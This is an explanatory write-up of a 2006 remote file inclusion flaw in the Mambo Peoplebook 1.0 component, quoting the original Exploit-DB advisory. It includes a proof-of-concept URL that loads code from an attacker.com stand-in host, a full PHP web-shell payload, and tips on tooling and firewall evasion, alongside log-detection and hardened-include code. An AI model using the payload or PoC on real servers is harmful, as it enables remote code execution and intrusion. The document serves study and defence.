Understanding Remote File Inclusion in Mambo Component Peoplebook 1.0

What this paper is
This paper, published in 2006, details a critical Remote File Inclusion (RFI) vulnerability found in version 1.0 of the "Peoplebook Component" for the Mambo content management system. The vulnerability allows a remote attacker to execute arbitrary PHP code on the target server by tricking the application into including and executing a malicious file hosted on an attacker-controlled server.
Simple technical breakdown
The vulnerability lies in the param.peoplebook.php script within the com_peoplebook component. This script attempts to include a language file based on the $selected_lang variable. Crucially, it uses the $mosConfig_absolute_path variable, which is not properly validated.
If two PHP configurations are enabled on the server:
- register_globals = On: This makes external variables (like those passed in the URL) directly available as global variables within the script.
- allow_fopenurl = On: This allows PHP functions like require_once to fetch files from remote URLs.
An attacker can manipulate the $mosConfig_absolute_path variable via the URL. Instead of pointing to a local directory, they can make it point to a remote URL. The require_once function, when allow_fopenurl is on, will then fetch and execute the PHP code from that remote URL, effectively leading to remote code execution.
Complete code and payload walkthrough
The core of the vulnerability is in a small snippet of PHP code from param.peoplebook.php:
<?php
if (file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php')) {
require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php');
}
else {
require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');
}
...
?>
Let's break this down:
- <?php ... ?>: The standard PHP opening and closing tags, indicating that the enclosed code is PHP.
- if (file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php')):
  - Purpose: This line checks if a language file exists at a specific path.
  - $mosConfig_absolute_path: This variable is intended to hold the absolute path to the Mambo installation directory on the server. However, the paper states it is not properly sanitized.
  - '/components/com_peoplebook/languages/': A hardcoded string representing a subdirectory within the Mambo installation.
  - $selected_lang: This variable is expected to contain the name of the language file to be loaded (e.g., 'english', 'spanish').
  - '.php': Appends the .php extension to the language name.
  - file_exists(...): This PHP function checks if the file specified by the constructed path exists.
- require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php');:
  - Purpose: If the file_exists check returns true, this line includes and evaluates the specified language file. require_once ensures that the file is included only once, even if called multiple times.
  - Behavior: Normally, this would include a legitimate language file from the local filesystem. However, if $mosConfig_absolute_path is controlled by the attacker and allow_fopenurl is enabled, this require_once can fetch a remote file.
- else { ... }:
  - Purpose: If the specified language file does not exist, this block is executed.
  - require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');: This line attempts to include the default english.php language file. This also becomes a potential RFI vector if the initial file_exists check fails or if the attacker can control $mosConfig_absolute_path to point to a remote file even for the default.
Proof of Concept (PoC) Explanation:
http://[target]/[path]/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= http://attacker.com/evil.txt?
- http://[target]/[path]/administrator/components/com_peoplebook/param.peoplebook.php: This is the URL to the vulnerable script on the target server.
- ?: This separates the URL path from the query parameters.
- mosConfig_absolute_path=: This is where the attacker injects their malicious value.
  - Because register_globals is On, the value provided after mosConfig_absolute_path= will be assigned to the $mosConfig_absolute_path variable within the param.peoplebook.php script.
  - The attacker sets it to http://attacker.com/evil.txt.
- http://attacker.com/evil.txt: This is the URL of a file hosted on the attacker's server. This file (evil.txt) would contain malicious PHP code.
- ?: The trailing ? after evil.txt is a common RFI technique. The script appends a fixed suffix ('/components/com_peoplebook/languages/...php') to $mosConfig_absolute_path; with the ? in place, that suffix becomes the query string of the remote URL rather than part of its path, so the attacker's server still serves evil.txt.
How it works together:
- The attacker sends the crafted URL.
- The web server receives the request and passes the mosConfig_absolute_path=http://attacker.com/evil.txt parameter to param.peoplebook.php.
- Due to register_globals = On, $mosConfig_absolute_path is set to http://attacker.com/evil.txt.
- The script then checks file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php'). Since $mosConfig_absolute_path is now a URL, this check does not behave like a local path check: file_exists() cannot stat() a resource through the http:// wrapper, so the condition is expected to fail.
- The else block is therefore reached (or the if branch is taken instead if $selected_lang is also manipulated). The script executes require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');.
- Because allow_fopenurl = On, require_once interprets $mosConfig_absolute_path as a remote URL and fetches http://attacker.com/evil.txt.
- If evil.txt contains PHP code (e.g., <?php system($_GET['cmd']); ?>), this code is executed on the target server.
Payload/Shellcode:
The paper doesn't provide specific shellcode bytes but implies the use of a simple PHP injection script. A common example for such an RFI would be:
<?php
// A simple remote shell payload
echo "<h1>Mambo RFI Exploit</h1>";
echo "<form method='post' action=''>";
echo "<input type='text' name='cmd' placeholder='Enter command'>";
echo "<input type='submit' value='Execute'>";
echo "</form>";
if(isset($_POST['cmd'])) {
echo "<pre>";
system($_POST['cmd']);
echo "</pre>";
}
?>
This PHP code, when hosted at http://attacker.com/evil.txt and included by the vulnerable Mambo component, would:
- Display a simple HTML form.
- Allow the attacker to input commands into a text field.
- Execute those commands on the target server using system($_POST['cmd']).
- Display the output of the executed command.
Mapping list:
- param.peoplebook.php: The vulnerable script.
- $mosConfig_absolute_path: The unsanitized variable that becomes the RFI vector.
- $selected_lang: A variable used to construct the path; it can also be manipulated.
- require_once(): The PHP function that performs the file inclusion, which can fetch remote files if allow_fopenurl is on.
- register_globals = On: A PHP configuration that makes URL parameters directly available as global variables, enabling attacker control over $mosConfig_absolute_path.
- allow_fopenurl = On: A PHP configuration that allows require_once (and other file functions) to fetch content from URLs.
- http://attacker.com/evil.txt: The attacker-controlled URL containing the malicious PHP payload.
Practical details for offensive operations teams
- Required Access Level: No elevated privileges are initially required. This is a remote, unauthenticated vulnerability.
- Lab Preconditions:
  - A target Mambo installation with the "Peoplebook Component" version 1.0 installed.
  - The target server must have PHP configured with register_globals = On and allow_fopenurl = On. These were common settings in older PHP versions (pre-5.3) but are now considered insecure and often disabled.
  - An attacker-controlled web server to host the malicious PHP file.
- Tooling Assumptions:
  - A web browser to craft and send requests.
  - A simple text editor to create the malicious PHP payload.
  - A web server (e.g., Apache, Nginx) on the attacker's machine to serve the payload.
  - Potentially, a proxy tool like Burp Suite or OWASP ZAP for intercepting and modifying requests, though not strictly necessary for this simple RFI.
- Execution Pitfalls:
  - PHP Configuration: The most significant pitfall is the target server's PHP configuration. If register_globals is Off or allow_fopenurl is Off, this specific RFI will not work. Modern PHP versions (5.3+) have register_globals disabled by default and it's strongly discouraged. allow_fopenurl might also be disabled for security reasons.
  - WAF/IDS Evasion: Older web application firewalls (WAFs) or intrusion detection systems (IDS) might not effectively detect simple RFI patterns. However, modern systems are much more adept at identifying and blocking such requests. Evasion might involve URL encoding, using different protocols (if supported by allow_fopenurl), or obfuscating the payload.
  - Path Traversal/File Existence: The file_exists check in the if statement could potentially prevent exploitation if the attacker cannot craft a $selected_lang value that, when combined with the remote path, satisfies the condition in a way that still allows require_once to fetch the remote file. However, the else block provides a fallback.
  - Payload Complexity: The evil.txt file must contain valid PHP code. If it contains syntax errors or non-PHP content, it will likely result in a PHP parse error on the target server, not code execution.
  - Target Path: The [path] in the URL needs to be correct for the Mambo installation.
- Telemetry:
  - Network Traffic: Outbound HTTP requests from the target server to the attacker's server (if allow_fopenurl is used for fetching).
  - Web Server Logs: Requests to param.peoplebook.php with unusual mosConfig_absolute_path parameters.
  - PHP Error Logs: PHP parse errors if the remote file is not valid PHP.
  - System Logs: If the executed payload performs system-level actions (e.g., creating files, running commands), these might be logged by the operating system or security tools.
  - Application Logs: Mambo or component-specific logs might show errors or unexpected behavior.
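The web-server-log telemetry above can be turned into a concrete check. The following is an added example written for this page, not code from the paper or from Mambo: it scans combined-format access-log lines for requests to param.peoplebook.php whose mosConfig_absolute_path value carries a URL scheme, the signature the PoC leaves behind. The function name and the sample log lines are constructed for illustration.

```php
<?php
// Added detection example (not from the paper): flag access-log lines where
// param.peoplebook.php was requested with a URL in mosConfig_absolute_path.

/**
 * Return true when one Apache/Nginx combined-format log line shows a
 * remote-path injection against param.peoplebook.php.
 */
function is_peoplebook_rfi_attempt(string $line): bool
{
    // Pull the request target out of the quoted "METHOD /path?query HTTP/x.y".
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return false;
    }
    $target = $m[1];
    $path   = (string) parse_url($target, PHP_URL_PATH);
    $query  = (string) parse_url($target, PHP_URL_QUERY);
    if (substr($path, -strlen('param.peoplebook.php')) !== 'param.peoplebook.php') {
        return false;
    }
    // parse_str() URL-decodes once, exactly as PHP did before assigning the
    // value under register_globals, so percent-encoded schemes are caught too.
    parse_str($query, $params);
    $value = $params['mosConfig_absolute_path'] ?? '';
    if (!is_string($value)) {
        return false; // array-style parameter, not a path string
    }
    // A legitimate install path never starts with a URL scheme.
    return (bool) preg_match('#^\s*[a-z][a-z0-9+.-]*://#i', $value);
}

// Constructed sample lines (not real traffic); attacker.example is a placeholder host.
$samples = [
    '203.0.113.5 - - [14/Aug/2006:10:00:01 +0000] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://attacker.example/evil.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [14/Aug/2006:10:00:02 +0000] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=%68ttp%3A%2F%2Fattacker.example%2Fevil.txt%3F HTTP/1.1" 200 512 "-" "curl/7.15"',
    '192.0.2.7 - - [14/Aug/2006:10:00:03 +0000] "GET /administrator/components/com_peoplebook/param.peoplebook.php?selected_lang=english HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

foreach ($samples as $line) {
    // First two samples are flagged, the third (a normal language request) is not.
    echo (is_peoplebook_rfi_attempt($line) ? 'ALERT ' : 'ok    '), $line, PHP_EOL;
}
```

Because register_globals also imports POST and cookie data, an attempt carried in a request body never appears in the access log's request line; pair this check with the outbound-connection telemetry listed above.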
Where this was used and when
- Context: This vulnerability was relevant to websites using the Mambo CMS and specifically the "Peoplebook Component" version 1.0.
- Timeframe: The paper was published on August 14, 2006. Therefore, this vulnerability was actively exploitable around 2006. Given that Mambo was a popular CMS at the time, it's likely that many sites were vulnerable. Mambo itself was later forked into Joomla!, so understanding these older vulnerabilities helps in appreciating the evolution of web application security.
Defensive lessons for modern teams
- Disable register_globals: This is a fundamental security best practice. It has been deprecated and removed in later PHP versions for good reason. Always ensure it's Off.
- Disable allow_fopenurl: Unless absolutely necessary for legitimate remote file operations (which is rare and should be carefully managed), disable allow_fopenurl in php.ini. This mitigates a wide range of RFI and SSRF vulnerabilities.
- Input Validation and Sanitization: Never trust user input. Always validate and sanitize any data coming from external sources (URL parameters, form data, cookies, etc.) before using it in file operations, database queries, or system commands. For file paths, use functions like basename() and ensure paths are absolute and within expected directories.
- Use Secure Coding Practices: Developers should be trained to avoid insecure functions or patterns. For file inclusions, prefer explicit paths and avoid user-controlled variables where possible. If dynamic includes are necessary, implement strict whitelisting of allowed file names.
- Keep Software Updated: Ensure CMS, components, plugins, and the underlying PHP version are always updated to the latest secure versions. Vulnerabilities like this are typically patched in later releases.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including RFI attempts. However, WAFs should be a layer of defense, not the sole solution.
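As an added example, not the component's or the paper's code, this is how the language include from param.peoplebook.php could be written so that neither half of the include path can be steered by a request: the base directory comes from a constant the application sets itself, and $selected_lang is checked against a strict allow-list and a realpath() containment test. The function name, the PEOPLEBOOK_LANG_DIR constant and reading selected_lang from $_GET are assumptions. Note that the php.ini directive is spelled allow_url_fopen, and since PHP 5.2 a URL in include/require additionally needs allow_url_include; both belong Off alongside the code fix.

```php
<?php
// Added defensive example (not the component's code): the language file to
// include is chosen from a fixed allow-list under a fixed base directory, so
// a request can no longer steer either half of the include path.

// Hypothetical constant: the install root is set by the application's own
// bootstrap and is never taken from the request (no register_globals reliance).
define('PEOPLEBOOK_LANG_DIR', __DIR__ . '/components/com_peoplebook/languages');

/**
 * Return the absolute local path of the language file to include, falling
 * back to english.php when the requested language is unknown. Never a URL.
 */
function peoplebook_language_file(string $requested): string
{
    // Allow-list: short lowercase names only, so no scheme (http://),
    // directory separator, NUL byte or traversal sequence can get through.
    if (!preg_match('/^[a-z]{2,16}$/', $requested)) {
        $requested = 'english';
    }
    $candidate = PEOPLEBOOK_LANG_DIR . '/' . $requested . '.php';

    // realpath() resolves symlinks and '..' and returns false for anything
    // that does not exist on the local filesystem (including URL strings).
    $resolved = realpath($candidate);
    $base     = realpath(PEOPLEBOOK_LANG_DIR);
    if ($resolved === false || $base === false
        || strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        $resolved = $base . DIRECTORY_SEPARATOR . 'english.php';
    }
    return $resolved;
}

// Read the language explicitly from the request instead of relying on
// register_globals, then include only the vetted local path.
$selected_lang = isset($_GET['selected_lang']) ? (string) $_GET['selected_lang'] : 'english';
require_once peoplebook_language_file($selected_lang);
```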
ASCII visual (if applicable)
+-----------------+        +-------------------------+        +-------------------+
| Attacker Server |  -->   |   Target Web Server     |  -->   |  Target PHP App   |
| (e.g., evil.com)|        | (e.g., vulnerable.com)  |        | (Mambo Component) |
+-----------------+        +-------------------------+        +-------------------+
        ^                               |
        |                               | HTTP Request
        |                               | (Crafted URL with
        |                               |  mosConfig_absolute_path=
        |                               |  http://evil.com/evil.php)
        |                               v
        |                  +-------------------------------+
        |                  | param.peoplebook.php          |
        |                  | (Vulnerable Script)           |
        |                  |                               |
        |                  | require_once(                 |
        |                  |   $mosConfig_absolute_path    |
        |                  |   . '/languages/' .           |
        |                  |   $selected_lang . '.php'     |
        |                  | )                             |
        |                  |                               |
        |                  | (If allow_fopenurl=On,        |
        |                  |  fetches http://evil.com/     |
        |                  |  evil.php and executes it)    |
        |                  +-------------------------------+
        |                               |
        |                               | PHP Code Execution
        |                               v
        +-------------------------------+
Source references
- Paper URL: https://www.exploit-db.com/papers/2184
- Exploit-DB Raw URL: https://www.exploit-db.com/raw/2184
- Affected Software: Mambo Component Peoplebook v1.0
- Author: Matdhule
- Publication Date: 2006-08-14
Original Exploit-DB Content (Verbatim)
---------------------------------------------------------------------------
Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities
---------------------------------------------------------------------------
Author : Matdhule
Date : August, 14th 2006
Location : Indonesia, Jakarta
Critical Lvl : Highly critical
Impact : System access
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Peoplebook Component
Application : Peoplebook Component
version : 1.0
URL : www.mamboforge.net/projects/peoplebook
---------------------------------------------------------------------------
Vulnerability:
~~~~~~~~~~~~~~
in folder com_peoplebook we found vulnerability script param.peoplebook.php.
-----------------------param.peoplebook.php----------------------
....
<?php
if (file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php')) {
require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php');
}
else {
require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');
}
...
----------------------------------------------------------
Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
Proof Of Concept:
~~~~~~~~~~~~~~~
http://[target]/[path]/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= http://attacker.com/evil.txt?
Solution:
~~~~~~~
sanitize variabel $mosConfig_absolute_path in param.peoplebook.php
---------------------------------------------------------------------------
Shoutz:
~~~~~
~ solpot a.k.a chris, J4mbi H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @ irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~
matdhule[at]gmail[dot]com
-------------------------------- [ EOF ] ----------------------------------
# milw0rm.com [2006-08-14]